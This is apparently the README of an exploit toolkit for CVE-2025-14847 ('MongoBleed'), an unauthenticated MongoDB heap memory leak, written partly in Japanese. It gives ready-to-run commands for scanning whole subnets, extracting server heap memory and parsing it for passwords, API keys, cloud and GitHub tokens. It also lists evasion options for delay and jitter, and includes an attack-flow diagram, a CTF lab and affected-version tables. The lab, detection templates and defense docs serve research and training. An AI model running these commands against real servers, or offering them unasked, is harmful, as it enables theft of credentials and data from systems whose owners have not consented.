
CVE-2025-14847 (MongoBleed) スキャナーおよびエクスプロイトツール。zlib 圧縮解除による未認証の MongoDB ヒープメモリリーク。検出、メモリ抽出、認証情報の解析、CIDR/バッチスキャン、Nuclei テンプレート、CTF ラボが含まれます。
CVE-2025-14847 スキャナーおよびエクスプロイトツールキット
MongoBleed 用のセキュリティ研究ツールキットです。MongoBleed は MongoDB の zlib 圧縮解除処理における深刻な未認証メモリリーク脆弱性であり、攻撃者が認証なしでサーバーのヒープメモリから機密データを抽出できるようにします。
╔╦╗┌─┐┌┐┌┌─┐┌─┐╔╗ ┬ ┌─┐┌─┐┌┬┐
║║║│ │││││ ┬│ │╠╩╗│ ├┤ ├┤ ││
╩ ╩└─┘┘└┘└─┘└─┘╚═╝┴─┘└─┘└─┘─┴┘
CVE-2025-14847 Scanner & Exploit
# No external dependencies -- Python 3 standard library only
cd cli
# Detect if a target is vulnerable (default action)
python mongobleed.py -t localhost:27017
# Scan an entire subnet
python mongobleed.py -t 192.168.1.0/24
# Extract memory and parse for credentials
python mongobleed.py -t target:27017 -e --credentials
# Safe mode -- detection only, no exploitation
python mongobleed.py -t target:27017 -s
MongoBleed/
├── cli/ # Command-line scanner and exploitation tool
│ ├── mongobleed.py # Main CLI tool
│ ├── requirements.txt # Python dependencies (stdlib only)
│ └── README.md # CLI documentation
├── lab/ # Docker-based CTF lab environment
│ ├── docker-compose.yml # Multi-container lab setup
│ ├── vulnerable/ # Vulnerable MongoDB configurations
│ ├── patched/ # Patched MongoDB for comparison
│ ├── no-zlib/ # Non-exploitable (zlib disabled)
│ ├── monitoring/ # Attack visualization dashboard
│ ├── warmup-heap.sh # Populate heap with sensitive data
│ └── README.md # Lab setup instructions
├── nuclei/ # Nuclei scanning templates
│ ├── CVE-2025-14847.yaml # Active exploitation template
│ ├── CVE-2025-14847-safe.yaml # Safe detection template
│ └── README.md # Nuclei template docs
├── docs/ # Educational documentation
│ ├── README.md # Learning path index
│ ├── 01-fundamentals.md # MongoDB & memory basics
│ ├── 02-vulnerability.md # CVE-2025-14847 deep dive
│ ├── 03-exploitation.md # Hands-on exploitation
│ ├── 04-detection.md # Hunting and detection
│ └── 05-defense.md # Mitigation strategies
└── README.md # This file
192.168.1.0/24、10.0.0.0/16:27018)# Check single target
python mongobleed.py -t localhost:27017
# Check with verbose output
python mongobleed.py -t localhost:27017 -v
# Safe mode -- detection only, never sends exploit payload
python mongobleed.py -t localhost:27017 -s
# Show version info
python mongobleed.py -t localhost:27017 --version
# Scan a /24 subnet
python mongobleed.py -t 192.168.1.0/24
# CIDR with custom port
python mongobleed.py -t 10.0.0.0/24:27018
# Scan from target file (CIDR ranges in file are expanded)
python mongobleed.py -T targets.txt -j 20 -o results.json
# Target file can contain IPs, host:port, and CIDR ranges
cat targets.txt
# 192.168.1.100:27017
# 10.0.0.0/24
# mongodb.internal:27017
# Extract memory (default offset range 20-8192)
python mongobleed.py -t target:27017 -e
# Custom offset range
python mongobleed.py -t target:27017 -e --min-offset 20 --max-offset 500
# Continuous extraction (Ctrl+C to stop)
python mongobleed.py -t target:27017 --continuous
# Force extraction even if version check is inconclusive
python mongobleed.py -t target:27017 -e --force
# Parse leaked memory for credentials and secrets
python mongobleed.py -t target:27017 -e --credentials
# Parse for tokens specifically
python mongobleed.py -t target:27017 -e --tokens
# Extract printable strings
python mongobleed.py -t target:27017 -e --strings
# Hexdump output
python mongobleed.py -t target:27017 -e --hexdump
# Add delay between requests (milliseconds)
python mongobleed.py -t target:27017 -e --delay 500
# Random jitter on delay
python mongobleed.py -t target:27017 -e --delay 1000 --jitter
# Safe detection only
nuclei -t nuclei/CVE-2025-14847-safe.yaml -u mongodb://localhost:27017
# Active detection
nuclei -t nuclei/CVE-2025-14847.yaml -u mongodb://localhost:27017
# Scan multiple targets
nuclei -t nuclei/ -l targets.txt
# Start all containers
cd lab && docker compose up -d
# Services:
# - localhost:27017 MongoDB 4.4.29 (Vulnerable + zlib)
# - localhost:27018 MongoDB 6.0.26 (Vulnerable + zlib)
# - localhost:27019 MongoDB 8.0.16 (Vulnerable + zlib)
# - localhost:27020 MongoDB 8.0.17 (Patched)
# - localhost:27021 MongoDB 8.0.16 (No zlib - not exploitable)
# - localhost:8080 Monitoring Dashboard
# Warm up heap with sensitive data before exploitation
./warmup-heap.sh 27017 50
# Run exploit against lab
cd ../cli
python mongobleed.py -t localhost:27017 -e --credentials
Target:
-t, --target TARGET Target host:port or CIDR range (e.g. 192.168.1.0/24)
-T, --targets FILE File with target list (supports CIDR per line)
Detection:
--detect Detect if target is vulnerable (default action)
--version Show MongoDB version
-s, --safe Safe mode - detection only, no exploitation
Exploitation:
-e, --extract Extract memory via offset scanning
--min-offset N Minimum offset to probe (default: 20)
--max-offset N Maximum offset to probe (default: 8192)
--continuous Continuous extraction mode
--force Force extraction even if version check fails
Analysis:
--credentials Parse for credentials
--tokens Parse for tokens
--strings Extract printable strings
--hexdump Display hexdump
Evasion:
--delay MS Delay between requests (milliseconds)
--jitter Random delay jitter
Output:
-o, --output FILE Output file (JSON)
-v, --verbose Verbose output
-q, --quiet Quiet mode
--json JSON output
--no-color Disable colors
Connection:
--timeout SECS Connection timeout (default: 10)
-j, --threads N Threads for batch scanning (default: 10)
このツールは抽出したメモリ内で以下のパターンを検索します:
MongoBleed は MongoDB の zlib メッセージ圧縮解除処理(message_compressor_zlib.cpp)の欠陥を悪用します。脆弱なコードは実際の圧縮解除後の長さではなく割り当てられたバッファサイズを返すため、攻撃者は初期化されていないヒープメモリを読み取ることができます。
1. CONNECT (no authentication required)
↓
2. SEND MALFORMED OP_COMPRESSED
┌──────────────────────────────────┐
│ originalOpcode: OP_MSG (2013) │
│ uncompressedSize: INFLATED │ ← Bug trigger
│ compressorId: zlib (2) │
│ compressedMessage: [small data] │
└──────────────────────────────────┘
↓
3. SERVER ALLOCATES OVERSIZED BUFFER
[ small real data | uninitialized heap memory ]
↓
4. BSON PARSER READS INTO HEAP GARBAGE
Inflated document length causes parser to read
beyond actual data into heap memory
↓
5. ERROR RESPONSE LEAKS MEMORY
"invalid BSON field name 'password=secret123...'"
本ツールキットは、正規のセキュリティテスト、研究、教育目的のみで提供されます。所有しているシステム、または明示的なテスト許可を得たシステムに対してのみ使用してください。コンピュータシステムへの不正アクセスは違法です。
MIT License
| 種別 | パターン例 |
|---|
| password | password: value, passwd=value |
| secret | secret: value |
| api_key | api_key: sk_live_... |
| token | token: ... (16文字以上) |
| bearer_token | Bearer eyJ... |
| jwt | eyJ... (Base64形式のJWT) |
| mongodb_uri | mongodb://user:pass@host |
| postgres_uri | postgresql://... |
| redis_uri | redis://... |
| stripe_key | sk_live_... |
| openai_key | sk-... (48文字以上) |
| aws_access_key | AKIA... |
| github_token | ghp_... |
| slack_token | xoxb-..., xoxp-... |
| ctf_flag | FLAG{...} |
| 項目 | 値 |
|---|
| CVE | CVE-2025-14847 |
| 名称 | MongoBleed |
| CWE | CWE-130 (長さパラメータの不適切な処理) |
| CVSS | 8.7 (高) |
| 種別 | 未認証メモリリーク |
| 公開日 | 2025年12月19日 |
| 実環境での悪用 | 2025年12月29日 |
| ブランチ | 脆弱なバージョン | パッチ適用済み |
|---|
| 8.2.x | 8.2.0 - 8.2.2 | 8.2.3 |
| 8.0.x | 8.0.0 - 8.0.16 | 8.0.17 |
| 7.0.x | 7.0.0 - 7.0.27 | 7.0.28 |
| 6.0.x | 6.0.0 - 6.0.26 | 6.0.27 |
| 5.0.x | 5.0.0 - 5.0.31 | 5.0.32 |
| 4.4.x | 4.4.0 - 4.4.29 | 4.4.30 |
| 4.2.x | 全バージョン | サポート終了 - パッチなし |
| 4.0.x | 全バージョン | サポート終了 - パッチなし |
| 3.6.x | 全バージョン | サポート終了 - パッチなし |